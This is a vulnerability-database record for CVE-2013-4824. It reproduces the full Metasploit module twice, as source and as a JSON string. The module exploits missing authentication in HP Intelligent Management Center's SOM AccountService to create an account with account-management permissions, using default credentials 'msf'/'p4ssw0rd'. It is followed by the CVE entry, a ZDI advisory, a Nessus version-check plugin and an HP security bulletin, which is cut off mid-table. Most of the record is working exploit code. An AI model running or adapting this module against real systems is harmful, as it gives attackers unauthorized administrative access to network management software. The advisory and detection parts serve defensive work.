ID MSF:AUXILIARY/ADMIN/HP/HP_IMC_SOM_CREATE_ACCOUNT Type metasploit Reporter Rapid7 Modified 2020-10-02T20:00:37
Description
This module exploits a lack of authentication and access control in HP Intelligent Management, specifically in the AccountService RpcServiceServlet from the SOM component, in order to create a SOM account with Account Management permissions. This module has been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Intelligent Management SOM Account Creation',
'Description' => %q{
This module exploits a lack of authentication and access control in HP Intelligent
Management, specifically in the AccountService RpcServiceServlet from the SOM component,
in order to create a SOM account with Account Management permissions. This module has
been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with
SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.
},
'References' =>
[
[ 'CVE', '2013-4824' ],
[ 'OSVDB', '98249' ],
[ 'BID', '62902' ],
[ 'ZDI', '13-240' ],
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943547' ]
],
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-10-08'
))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [true, 'Username for the new account', 'msf']),
OptString.new('PASSWORD', [true, 'Password for the new account', 'p4ssw0rd'])
])
end
def get_service_desk_strong_name
res = send_request_cgi({
'uri' => normalize_uri("servicedesk", "servicedesk", "servicedesk.nocache.js"),
'method' => 'GET'
})
if res and res.code == 200 and res.body =~ /unflattenKeylistIntoAnswers\(\['default', 'safari'\], '([0-9A-Fa-f]+)'\);/
return $1
end
return nil
end
def get_account_service_strong_name(service_desk)
res = send_request_cgi({
'uri' => normalize_uri("servicedesk", "servicedesk", "#{service_desk}.cache.html"),
'method' => 'GET'
})
if res and res.code == 200 and res.body =~ /'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/
return $1
end
return nil
end
def run
print_status("Trying to find the service desk service strong name...")
service_desk = get_service_desk_strong_name
if service_desk.nil?
print_error("service desk service not found.")
return
end
print_good("service desk strong number found: #{service_desk}")
print_status("Trying to find the AccountService strong name...")
account_service = get_account_service_strong_name(service_desk)
if account_service.nil?
print_error("AccountService service not found.")
return
end
print_good("AccountService strong number found: #{account_service}")
header= "6|0|39" # version | unknown | string_table size
# Used to parse the payload
string_table = [
"http://localhost:8080/servicedesk/servicedesk/", # 1 servlet URL
"#{account_service}", # 2 AccountService strong name
"com.h3c.imc.eu.client.account.AccountService", # 3 GWT Service Class
"addAccount", # 4 GWT Service Method
"com.extjs.gxt.ui.client.data.BaseModelData/3541881726", # 5 BaseModelData Type
"com.extjs.gxt.ui.client.data.RpcMap/3441186752", # 6 RpcMap Type
"isAccount", # 7 isAccount Field
"java.lang.Boolean/476441737", # 8 Boolean Type
"ssName", # 9 ssName Field
"java.lang.String/2004016611", # 10 String Type
datastore["USERNAME"], # 11 ssName Value
"authType", # 12 authType Field
"java.lang.Integer/3438268394", # 13 Integer Type
"ssPassword", # 14 ssPassword Field
datastore["PASSWORD"], # 15 ssPassword value
"accountGroups", # 16 accountGroups Field
"java.util.ArrayList/3821976829", # 17 ArayList Type
"permissions", # 18 permissions Field
"iMC-SOM-SERVICEDESK", # 19 permissions Value
"iMC-SOM-SERVICEDESK.PROCTASK", # 20 permissions Value
"iMC-SOM-SERVICEDESK.ACCT", # 21 permissions Value
"iMC-SOM-SERVICEDESK.ACCT.VIEW", # 22 permissions Value
"iMC-SOM-SERVICEDESK.ACCT.ADD", # 23 permissions Value
"iMC-SOM-SERVICEDESK.ACCT.MOD", # 24 permissions Value
"iMC-SOM-SERVICEDESK.ACCT.DEL", # 25 permissions Value
"userName", # 26 userName Field
"certification", # 27 certification Field
"userGroupId", # 28 userGroupId Field
"java.lang.Long/4227064769", # 29 Long Type
"userGroupName", # 30 userGroupName Field
"Ungrouped", # 31 userGroupName Value
"userGroupDescription", # 32 userGroupDescription Field
"Ungrouped User.This record is generated by system, can not be deleted.", # 33 userGroupDescription Value
"address", # 34 address Field
"", # 35 address Value
"phone", # 36 phone Field
"email", # 37 email Field
"userAppendInfo", # 38 userAppendInfo Field
"java.util.HashMap/962170901" # 39 HashMap Type
].join("|")
payload = [
"1", # servlet URL
"2", # strong name
"3", # GWT Service Class
"4", # GWT Service Method (addAccount)
"1", # number of method parameters (addAccount has 1 parameter)
"5", # parameter type (BaseModelData)
"5", # read BaseModelData
"1", # read 1 object into the BaseModelData
"6", # read RpcMap
"15", # read 15 objects into the RpcMap
"7", # RpcMap[0] => isAccount
"8", # isAccount Type (Boolean)
"1", # isAccount Value (true)
"9", # RpcMap[1] => ssName
"10", # ssName Type (String)
"11", # ssName Value
"12", # RpcMap[2] => authType
"13", # authType Type
"0", # authType Value (0 => password)
"14", # RpcMap[3] => ssPassword
"10", # ssPassword Type (String)
"15", # ssPassword Value
"16", # RpcMap[4] => accountGroups
"17", # accountGroups Type (ArrayList)
"0", # accountGroups size (0)
"18", # RpcMap[5] => permissions
"17", # permissions Type (ArrayList)
"7", # permissions size (7)
"10", # permissions[0] Type (String)
"19", # permissions[0] Value (iMC-SOM-SERVICEDESK)
"10", # permissions[1] Type (String)
"20", # permissions[1] Value (iMC-SOM-SERVICEDESK.PROCTASK)
"10", # permissions[2] Type (String)
"21", # permissions[2] Value (iMC-SOM-SERVICEDESK.ACCT)
"10", # permissions[3] Type (String)
"22", # permissions[3] Value (iMC-SOM-SERVICEDESK.ACCT.VIEW)
"10", # permissions[4] Type (String)
"23", # permissions[4] Value (iMC-SOM-SERVICEDESK.ACCT.ADD)
"10", # permissions[5] Type (String)
"24", # permissions[5] Value (iMC-SOM-SERVICEDESK.ACCT.MOD)
"10", # permissions[6] Type (String)
"25", # permissions[6] Value (iMC-SOM-SERVICEDESK.ACCT.DEL)
"26", # RpcMap[6] => username
"-4", # username Type - not provided
"27", # RpcMap[7] => certification
"-4", # certification Type - not provided
"28", # RpcMap[8] => userGroupId
"29", # userGroupId Type (Long)
"B", # userGroupId Value - not provided
"30", # RpcMap[9] => userGroupName
"10", # userGroupName Type (String)
"31", # userGroupName Value (Ungrouped)
"32", # RpcMap[10] => userGroupDescription
"10", # userGroupDescription Type (String)
"33", # userGroupDescription Value (Ungrouped User.This record is generated by system, can not be deleted.)
"34", # RpcMap[11] => address
"10", # address Type (String)
"35", # address Value ("")
"36", # RpcMap[12] => phone
"-19",# phone Type - not provided
"37", # RpcMap[13] => email
"-19",# email Type - not provided
"38", # RpcMap[14] => userAppendInfo
"39", # userAppendInfo Type (HashMap)
"0" # userAppendInfo HashMap size (0)
].join("|")
gwt_request = [header, string_table, payload].join("|")
gwt_request << "|" # end
service_url = ssl ? "https://" : "http://"
service_url << "#{rhost}:#{rport}/servicedesk/servicedesk/"
print_status("Trying to create account #{datastore["USERNAME"]}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("servicedesk", "servicedesk", "accountSerivce.gwtsvc"),
'ctype' => 'text/x-gwt-rpc; charset=UTF-8',
'headers' => {
"X-GWT-Module-Base" => service_url,
"X-GWT-Permutation" => "#{service_desk}"
},
'data' => gwt_request
})
unless res and res.code == 200
print_error("Unknown error while creating the user.")
return
end
if res.body =~ /Username.*already exists/
print_error("The user #{datastore["USERNAME"]} already exists.")
return
elsif res.body =~ /Account.*added successfully/
login_url = ssl ? "https://" : "http://"
login_url << "#{rhost}:#{rport}/servicedesk/ServiceDesk.jsp"
connection_details = {
module_fullname: self.fullname,
username: datastore['USERNAME'],
private_data: datastore['PASSWORD'],
private_type: :password,
workspace_id: myworkspace_id,
proof: "#{login_url}\n#{res.body}",
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_details)
create_credential_and_login(connection_details)
print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.")
print_status("Use it to log into #{login_url}")
end
end
end
{"id": "MSF:AUXILIARY/ADMIN/HP/HP_IMC_SOM_CREATE_ACCOUNT", "type": "metasploit", "bulletinFamily": "exploit", "title": "HP Intelligent Management SOM Account Creation", "description": "This module exploits a lack of authentication and access control in HP Intelligent Management, specifically in the AccountService RpcServiceServlet from the SOM component, in order to create a SOM account with Account Management permissions. This module has been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.\n", "published": "2013-10-23T21:01:01", "modified": "2020-10-02T20:00:37", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4824", "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943547"], "cvelist": ["CVE-2013-4824"], "lastseen": "2020-10-12T22:22:11", "viewCount": 10, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2020-10-12T22:22:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4824"]}, {"type": "zdi", "idList": ["ZDI-13-240"]}, {"type": "nessus", "idList": ["HP_IMC_SOM_70_E0101.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13339", "SECURITYVULNS:DOC:29907"]}], "modified": "2020-10-12T22:22:11", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/hp/hp_imc_som_create_account.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Intelligent Management SOM Account Creation',\n 'Description' => %q{\n This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.\n },\n 'References' =>\n [\n [ 'CVE', '2013-4824' ],\n [ 'OSVDB', '98249' ],\n [ 'BID', '62902' ],\n [ 'ZDI', '13-240' ],\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943547' ]\n ],\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2013-10-08'\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('USERNAME', [true, 'Username for the new account', 'msf']),\n OptString.new('PASSWORD', [true, 'Password for the new account', 'p4ssw0rd'])\n ])\n end\n\n def get_service_desk_strong_name\n res = send_request_cgi({\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"servicedesk.nocache.js\"),\n 'method' => 'GET'\n })\n\n if res and res.code == 200 and res.body =~ /unflattenKeylistIntoAnswers\\(\\['default', 'safari'\\], '([0-9A-Fa-f]+)'\\);/\n return $1\n end\n\n return nil\n end\n\n def get_account_service_strong_name(service_desk)\n res = send_request_cgi({\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"#{service_desk}.cache.html\"),\n 'method' => 'GET'\n })\n\n if res and res.code == 200 and res.body =~ /'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/\n return $1\n end\n\n return nil\n end\n\n def run\n\n print_status(\"Trying to find the service desk service strong name...\")\n service_desk = get_service_desk_strong_name\n if service_desk.nil?\n print_error(\"service desk service not found.\")\n return\n end\n print_good(\"service desk strong number found: #{service_desk}\")\n\n print_status(\"Trying to find the AccountService strong name...\")\n account_service = get_account_service_strong_name(service_desk)\n if account_service.nil?\n print_error(\"AccountService service not found.\")\n return\n end\n print_good(\"AccountService strong number found: #{account_service}\")\n\n header= \"6|0|39\" # version | unknown | string_table size\n\n # Used to parse the payload\n string_table = [\n \"http://localhost:8080/servicedesk/servicedesk/\", # 1 servlet URL\n \"#{account_service}\", # 2 AccountService strong name\n \"com.h3c.imc.eu.client.account.AccountService\", # 3 GWT Service Class\n \"addAccount\", # 4 GWT Service Method\n \"com.extjs.gxt.ui.client.data.BaseModelData/3541881726\", # 5 BaseModelData Type\n \"com.extjs.gxt.ui.client.data.RpcMap/3441186752\", # 6 RpcMap Type\n \"isAccount\", # 7 isAccount Field\n \"java.lang.Boolean/476441737\", # 8 Boolean Type\n \"ssName\", # 9 ssName Field\n \"java.lang.String/2004016611\", # 10 String Type\n datastore[\"USERNAME\"], # 11 ssName Value\n \"authType\", # 12 authType Field\n \"java.lang.Integer/3438268394\", # 13 Integer Type\n \"ssPassword\", # 14 ssPassword Field\n datastore[\"PASSWORD\"], # 15 ssPassword value\n \"accountGroups\", # 16 accountGroups Field\n \"java.util.ArrayList/3821976829\", # 17 ArayList Type\n \"permissions\", # 18 permissions Field\n \"iMC-SOM-SERVICEDESK\", # 19 permissions Value\n \"iMC-SOM-SERVICEDESK.PROCTASK\", # 20 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT\", # 21 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.VIEW\", # 22 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.ADD\", # 23 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.MOD\", # 24 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.DEL\", # 25 permissions Value\n \"userName\", # 26 userName Field\n \"certification\", # 27 certification Field\n \"userGroupId\", # 28 userGroupId Field\n \"java.lang.Long/4227064769\", # 29 Long Type\n \"userGroupName\", # 30 userGroupName Field\n \"Ungrouped\", # 31 userGroupName Value\n \"userGroupDescription\", # 32 userGroupDescription Field\n \"Ungrouped User.This record is generated by system, can not be deleted.\", # 33 userGroupDescription Value\n \"address\", # 34 address Field\n \"\", # 35 address Value\n \"phone\", # 36 phone Field\n \"email\", # 37 email Field\n \"userAppendInfo\", # 38 userAppendInfo Field\n \"java.util.HashMap/962170901\" # 39 HashMap Type\n ].join(\"|\")\n\n payload = [\n \"1\", # servlet URL\n \"2\", # strong name\n \"3\", # GWT Service Class\n \"4\", # GWT Service Method (addAccount)\n \"1\", # number of method parameters (addAccount has 1 parameter)\n \"5\", # parameter type (BaseModelData)\n \"5\", # read BaseModelData\n \"1\", # read 1 object into the BaseModelData\n \"6\", # read RpcMap\n \"15\", # read 15 objects into the RpcMap\n \"7\", # RpcMap[0] => isAccount\n \"8\", # isAccount Type (Boolean)\n \"1\", # isAccount Value (true)\n \"9\", # RpcMap[1] => ssName\n \"10\", # ssName Type (String)\n \"11\", # ssName Value\n \"12\", # RpcMap[2] => authType\n \"13\", # authType Type\n \"0\", # authType Value (0 => password)\n \"14\", # RpcMap[3] => ssPassword\n \"10\", # ssPassword Type (String)\n \"15\", # ssPassword Value\n \"16\", # RpcMap[4] => accountGroups\n \"17\", # accountGroups Type (ArrayList)\n \"0\", # accountGroups size (0)\n \"18\", # RpcMap[5] => permissions\n \"17\", # permissions Type (ArrayList)\n \"7\", # permissions size (7)\n \"10\", # permissions[0] Type (String)\n \"19\", # permissions[0] Value (iMC-SOM-SERVICEDESK)\n \"10\", # permissions[1] Type (String)\n \"20\", # permissions[1] Value (iMC-SOM-SERVICEDESK.PROCTASK)\n \"10\", # permissions[2] Type (String)\n \"21\", # permissions[2] Value (iMC-SOM-SERVICEDESK.ACCT)\n \"10\", # permissions[3] Type (String)\n \"22\", # permissions[3] Value (iMC-SOM-SERVICEDESK.ACCT.VIEW)\n \"10\", # permissions[4] Type (String)\n \"23\", # permissions[4] Value (iMC-SOM-SERVICEDESK.ACCT.ADD)\n \"10\", # permissions[5] Type (String)\n \"24\", # permissions[5] Value (iMC-SOM-SERVICEDESK.ACCT.MOD)\n \"10\", # permissions[6] Type (String)\n \"25\", # permissions[6] Value (iMC-SOM-SERVICEDESK.ACCT.DEL)\n \"26\", # RpcMap[6] => username\n \"-4\", # username Type - not provided\n \"27\", # RpcMap[7] => certification\n \"-4\", # certification Type - not provided\n \"28\", # RpcMap[8] => userGroupId\n \"29\", # userGroupId Type (Long)\n \"B\", # userGroupId Value - not provided\n \"30\", # RpcMap[9] => userGroupName\n \"10\", # userGroupName Type (String)\n \"31\", # userGroupName Value (Ungrouped)\n \"32\", # RpcMap[10] => userGroupDescription\n \"10\", # userGroupDescription Type (String)\n \"33\", # userGroupDescription Value (Ungrouped User.This record is generated by system, can not be deleted.)\n \"34\", # RpcMap[11] => address\n \"10\", # address Type (String)\n \"35\", # address Value (\"\")\n \"36\", # RpcMap[12] => phone\n \"-19\",# phone Type - not provided\n \"37\", # RpcMap[13] => email\n \"-19\",# email Type - not provided\n \"38\", # RpcMap[14] => userAppendInfo\n \"39\", # userAppendInfo Type (HashMap)\n \"0\" # userAppendInfo HashMap size (0)\n ].join(\"|\")\n\n gwt_request = [header, string_table, payload].join(\"|\")\n gwt_request << \"|\" # end\n\n service_url = ssl ? \"https://\" : \"http://\"\n service_url << \"#{rhost}:#{rport}/servicedesk/servicedesk/\"\n\n print_status(\"Trying to create account #{datastore[\"USERNAME\"]}...\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"accountSerivce.gwtsvc\"),\n 'ctype' => 'text/x-gwt-rpc; charset=UTF-8',\n 'headers' => {\n \"X-GWT-Module-Base\" => service_url,\n \"X-GWT-Permutation\" => \"#{service_desk}\"\n },\n 'data' => gwt_request\n })\n\n unless res and res.code == 200\n print_error(\"Unknown error while creating the user.\")\n return\n end\n\n if res.body =~ /Username.*already exists/\n print_error(\"The user #{datastore[\"USERNAME\"]} already exists.\")\n return\n elsif res.body =~ /Account.*added successfully/\n login_url = ssl ? \"https://\" : \"http://\"\n login_url << \"#{rhost}:#{rport}/servicedesk/ServiceDesk.jsp\"\n\n connection_details = {\n module_fullname: self.fullname,\n username: datastore['USERNAME'],\n private_data: datastore['PASSWORD'],\n private_type: :password,\n workspace_id: myworkspace_id,\n proof: \"#{login_url}\\n#{res.body}\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n create_credential_and_login(connection_details)\n\n print_good(\"Account #{datastore[\"USERNAME\"]}/#{datastore[\"PASSWORD\"]} created successfully.\")\n print_status(\"Use it to log into #{login_url}\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2020-10-03T12:46:06", "description": "Unspecified vulnerability in HP Intelligent Management Center (iMC) and HP IMC Service Operation Management Software Module allows remote attackers to bypass authentication via unknown vectors, aka ZDI-CAN-1644.", "edition": 4, "cvss3": {}, "published": "2013-10-13T10:20:00", "title": "CVE-2013-4824", "type": "cve", "cwe": ["NVD-CWE-noinfo", "CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4824"], "modified": "2019-10-09T23:08:00", "cpe": ["cpe:/a:hp:imc_service_operation_management_software_module:-", "cpe:/a:hp:intelligent_management_center:*"], "id": "CVE-2013-4824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4824", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hp:intelligent_management_center:*:*:*:*:*:*:*:*", "cpe:2.3:a:hp:imc_service_operation_management_software_module:-:*:*:*:*:*:*:*"]}], "zdi": [{"lastseen": "2020-06-22T11:41:01", "bulletinFamily": "info", "cvelist": ["CVE-2013-4824"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Intelligent Management Center. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SOM's euAccountService servlet. No authentication is required to take advantage of this vulnerability, which allows the creation of a web administration account. An attacker can leverage this to manipulate other devices and users managed by the application and possibly leverage this situation to achieve remote code execution.", "modified": "2013-06-22T00:00:00", "published": "2013-10-16T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-240/", "id": "ZDI-13-240", "title": "Hewlett-Packard Intelligent Management Center SOM euAccountService Servlet Authentication Bypass Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T03:15:34", "description": "The version of the HP Intelligent Management Center Service Operation\nManagement Software Module on the remote is prior to 7.0 E0101. It is\ntherefore, potentially affected by multiple vulnerabilities :\n\n - An authentication bypass vulnerability exists in the\n 'euAccountService' servlet that allows arbitrary users\n to be created without authentication. (CVE-2013-4824)\n\n - An information disclosure vulnerability exists in the\n 'sdFileDownload' servlet that allows for arbitrary file\n access. (CVE-2013-4826)", "edition": 26, "published": "2014-01-09T00:00:00", "title": "HP Intelligent Management Center SOM Module < 7.0 E0101 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4824", "CVE-2013-4826"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:intelligent_management_center"], "id": "HP_IMC_SOM_70_E0101.NASL", "href": "https://www.tenable.com/plugins/nessus/71892", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71892);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n\n script_cve_id(\"CVE-2013-4824\", \"CVE-2013-4826\");\n script_bugtraq_id(62898, 62902);\n\n script_name(english:\"HP Intelligent Management Center SOM Module < 7.0 E0101 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of the HP Intelligent Management Center Service Operation\nManagement Software module on the remote host is affected by multiple\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of the HP Intelligent Management Center Service Operation\nManagement Software Module on the remote is prior to 7.0 E0101. It is\ntherefore, potentially affected by multiple vulnerabilities :\n\n - An authentication bypass vulnerability exists in the\n 'euAccountService' servlet that allows arbitrary users\n to be created without authentication. (CVE-2013-4824)\n\n - An information disclosure vulnerability exists in the\n 'sdFileDownload' servlet that allows for arbitrary file\n access. (CVE-2013-4826)\"\n );\n # https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c03943547-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d181e26a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-243/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-242/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the iMC SOM module to version 7.0 E0101 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:intelligent_management_center\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies('hp_imc_detect.nbin');\n script_require_ports('Services/activemq', 61616);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Figure out which port to use\nport = get_service(svc:'activemq', default:61616, exit_on_fail:TRUE);\n\nversion = get_kb_item_or_exit('hp/hp_imc/' + port + '/components/iMC-SOM-SERVICEDESK/version');\n\n# Versions 5.2 E0401 and earlier are affected\nif (version =~ '^([0-4]\\\\.|5\\\\.(0\\\\-|1\\\\-|2\\\\-E0([0-9]{1,2}|[0-3][0-9]{2}|40[01])([^0-9]|$)))')\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.0-E0101' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'HP Intelligent Management Center SOM Component', port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "cvelist": ["CVE-2013-4824", "CVE-2013-4825", "CVE-2013-4826", "CVE-2013-4827"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03943547\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03943547\r\nVersion: 1\r\n\r\nHPSBGN02930 rev.1 - HP Intelligent Management Center(iMC) and HP IMC Service\r\nOperation Management Software Module, Remote Authentication Bypass,\r\nDisclosure of Information, Unauthorized Access, SQL Injection\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-10-08\r\nLast Updated: 2013-10-08\r\n\r\nPotential Security Impact: Remote authentication bypass, disclosure of\r\ninformation, unauthorized access, SQL injection.\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP Intelligent\r\nManagement Center(iMC) and HP IMC Service Operation Management Software\r\nModule. The vulnerabilities could be remotely exploited resulting in\r\nauthentication bypass, disclosure of information, unauthorized access, and\r\nSQL injection.\r\n\r\nReferences:\r\n\r\nCVE-2013-4824 (ZDI-CAN-1644, SSRT101023) Remote Authentication Bypass\r\n\r\nCVE-2013-4825 (ZDI-CAN-1645, SSRT101028) Remote Unauthorized Access\r\n\r\nCVE-2013-4826 (ZDI-CAN-1647, SSRT101024) Remote Disclosure of Information\r\n\r\nCVE-2013-4827 (ZDI-CAN-1664, SSRT101031) SQL Injection\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nPlease refer to the RESOLUTION\r\n section below for a list of impacted products.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4824 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-4825 (AV:L/AC:L/Au:N/C:P/I:N/A:P) 3.6\r\nCVE-2013-4826 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-4827 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nHP's Zero Day Initiative to report CVE-2013-4824 through CVE-2013-4827 to\r\nsecurity-alert@hp.com\r\n\r\nRESOLUTION\r\nHP has provided the following software updates to resolve these\r\nvulnerabilities here...\r\n\r\nhttp://www.hp.com/networking/support\r\n\r\nHP Product\r\n Fixed Version\r\n HP Products Impacted\r\n CVE\r\n\r\niMC Basic\r\n HP_iMC_PLAT_7.0_E0102_Basic\r\n JG546AAE HP IMC Basic SW Platform w/50-node E-LTU\r\nJG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\r\n CVE-2013-4825\r\n\r\niMC Basic WLAN\r\n HP_iMC_WSM_7.0_E0102_Basic\r\n JG550AAE HP PMM to IMC Bsc WLM Upgr w/150AP E-LTU\r\nJG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU\r\n CVE-2013-4825\r\n\r\niMC Standard\r\n HP_iMC_PLAT_7.0_E0102_Standard_Linux\r\nHP_iMC_PLAT_7.0_E0102_Standard_Windows\r\n JF377A HP IMC Std S/W Platform w/100-node Lic JF377AAE HP IMC Std S/W Pltfrm\r\nw/100-node E-LTU JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU JG747AAE\r\nHP IMC Std SW Plat w/ 50 Nodes E-LTU\r\n CVE-2013-4825\r\n\r\niMC Enterprise\r\n HP_iMC_PLAT_7.0_E0102_Enterprise_Linux\r\nHP_iMC_PLAT_7.0_E0102_Enterprise_Windows\r\n JF378A HP IMC Ent S/W 